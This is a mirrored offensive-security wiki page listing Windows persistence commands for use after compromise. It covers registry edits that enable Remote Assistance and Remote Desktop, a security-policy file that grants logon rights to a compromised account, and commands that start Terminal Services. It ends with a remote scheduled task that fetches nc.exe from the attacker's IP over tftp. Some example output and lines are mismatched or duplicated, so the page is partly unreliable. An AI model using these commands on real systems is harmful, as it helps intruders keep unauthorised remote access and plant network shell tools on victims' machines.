weyne/pwnwiki.github.io
1
0
Fork 0
mirror of https://github.com/oXis/pwnwiki.github.io.git synced 2025-10-29 16:56:59 +00:00
Code Issues Packages Projects Releases Wiki Activity
pwnwiki.github.io/persistence/windows/general.md

4.1 KiB
Raw Blame History

Windows General Persistence Commands

Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the cmd.exe or command.exe prompt.

Remote Assistance Enable

  • Command with arguments: reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
  • Description: Must be admin to run this. Enable remote assistance through adding a registry entry on the local system.
  • Output:
    • **Windows 2008:** Show/Hide
      C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

The operation completed successfully.

Remote Desktop Enable - Method 1

  • Command with arguments: reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
  • Description: Must be admin to run this. Enable remote desktop through adding a registry entry on the local system.
  • Output:
    • **Windows 2008:** Show/Hide
      C:\Windows\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

The operation completed successfully.

Remote Desktop Enable - Method 2

Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 53), you can remotely enable remote desktop using the commands below.

  1. On the compromised system, create a file named fix_ts_policy.ini containing the contents below. Change the "hacked_account" value to the account you have compromised on the remote system.

     [Unicode]
     Unicode=yes
     [Version]
     signature="$CHICAGO$"
     Revision=1
     [Privilege Rights] [Privilege Rights]
     seremoteinteractivelogonright = hacked_account
     seinteractivelogonright = hacked_account
     sedenyinteractivelogonright =
     sedenyremoteinteractivelogonright =
     sedenynetworklogonright =

  2. Create another file named enable_ts.reg containing the contents below.

     Windows Registry Editor Version 5.00
 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
 "fDenyTSConnections"=dword:00000000
 "TSEnabled"=dword:00000001
 "TSUserEnabled"=dword:00000000

  3. On the remote system, execute the following commands:

    c:\> sc config termservice start= auto sc config termservice start= auto

c:> regedit /s enable_ts.reg c:> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb c:> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb c:> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini c:> gpupdate /Force c:> net start "terminal services"

Scheduler

The Windows scheduler can be used to further compromise a system. It usually runs at the SYSTEM account privilege level. According to Val Smith's and Colin Ames' BlackHat 2008 presentation (page 58), you can remotely schedule tasks using the commands below.

c:\> net use \\[TargetIP]\ipc$ password /user:username
c:\> at \\[TargetIP] 12:00 pm command

An example you might run on the remote system might be: at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe